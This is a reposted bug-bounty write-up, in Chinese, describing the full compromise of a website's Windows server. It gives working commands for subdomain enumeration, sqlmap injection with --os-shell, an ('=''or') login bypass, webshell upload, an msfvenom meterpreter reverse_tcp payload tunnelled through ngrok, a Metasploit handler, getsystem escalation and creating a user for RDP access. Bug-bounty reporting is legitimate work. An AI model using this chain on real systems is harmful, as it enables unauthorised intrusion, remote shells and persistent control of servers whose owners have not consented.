通过 SQL 注入访问服务器

admin 2023年6月25日10:11:14评论26 views字数 1797阅读5分59秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

来源:Medium,作者:RyuuKhagetsu

现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安设为星标”,否则可能看不到了

正文

首先使用amasssubfinder枚举子域,并借助 tomnomnom 制作的工具,即anew
amass enum -d site.com -passive | anew subs.txt && subfinder -d site.com -silent | anew subs.txt
之后,我使用httpx来过滤活动域,使用以下命令
cat subs.txt | httpx -mc 200 -o 200-subs.txt
由于只有几个活动域,我在浏览器中一个一个地打开,我看到了这样一个登录页面。
通过 SQL 注入访问服务器!!!
我尝试输入 ' 并显示一条错误消息。
通过 SQL 注入访问服务器!!!
我立即使用SQLmap进行注入。使用以下命令
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — dbs
等了一会,得到了几个数据库
通过 SQL 注入访问服务器!!!
然后我尝试使用以下命令查看我的用户是否为 root
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — is-dba
通过 SQL 注入访问服务器!!!
是的,我获得了root用户,然后我尝试使用以下命令获取shell
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — os-shell
不幸的是,我没有得到反向连接,我真的很想转储数据,但不允许。
回到表单登录,我尝试使用 ('=''or') 绕过它,没想到,我成功登录了。
我很快继续上传一个 shell,它成功了。但是,所有目录都显示为红色。
通过 SQL 注入访问服务器!!!

我在心里想:“我可以获取管理员用户吗?” 我尝试使用 Metasploit 和 Ngrok 进行反向连接。

打开终端并使用命令启动 ngrok

ngrok TCP 1337
通过 SQL 注入访问服务器!!!
然后,我为反向连接创建了一个payload,因为这个网站使用的是 Windows 服务器,我使用以下命令创建了它
msfvenom -p windows/meterpreter/reverse_tcp lhost=*without tcp://* lport=*Enter the port* -f exe -o back.exe
通过 SQL 注入访问服务器!!!
之后,我运行了 Metasploit 并使用了以下命令
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 0.0.0.0set lport 1337 ( If you are using a different port, then use the port you specified when setting up “ngrok tcp port” )exploit
通过 SQL 注入访问服务器!!!
一切运行完毕后,就可以使用 webshell 上传之前创建的 payload 了,然后使用命令执行功能来执行刚上传的这个 Payload。
通过 SQL 注入访问服务器!!!
回到metasploit,成功获取了backconnect。
通过 SQL 注入访问服务器!!!
我使用“shell”命令访问命令提示符 (CMD),然后检查我的用户。
nt authority*not_administrator*
通过 SQL 注入访问服务器!!!
使用命令“exit”返回到 meterpreter,然后我执行以下命令得到了管理员用户
getsystemgetuid
通过 SQL 注入访问服务器!!!
之后,我新建了一个用户,访问RDP(Remote Desktop Protocol),报告成功获取服务器访问权限。
通过 SQL 注入访问服务器!!!

我立即报告了我的发现,并且由于我发现的错误,我收到了几个确认和奖励,因为它们包含多个网站。

可能我的就这些吧,希望能给大家一个参考,我是RyuuKhagetsu,下篇文章见。

原文始发于微信公众号(潇湘信安):通过 SQL 注入访问服务器!!!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月25日10:11:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通过 SQL 注入访问服务器http://cn-sec.com/archives/1831362.html

发表评论

匿名网友 填写信息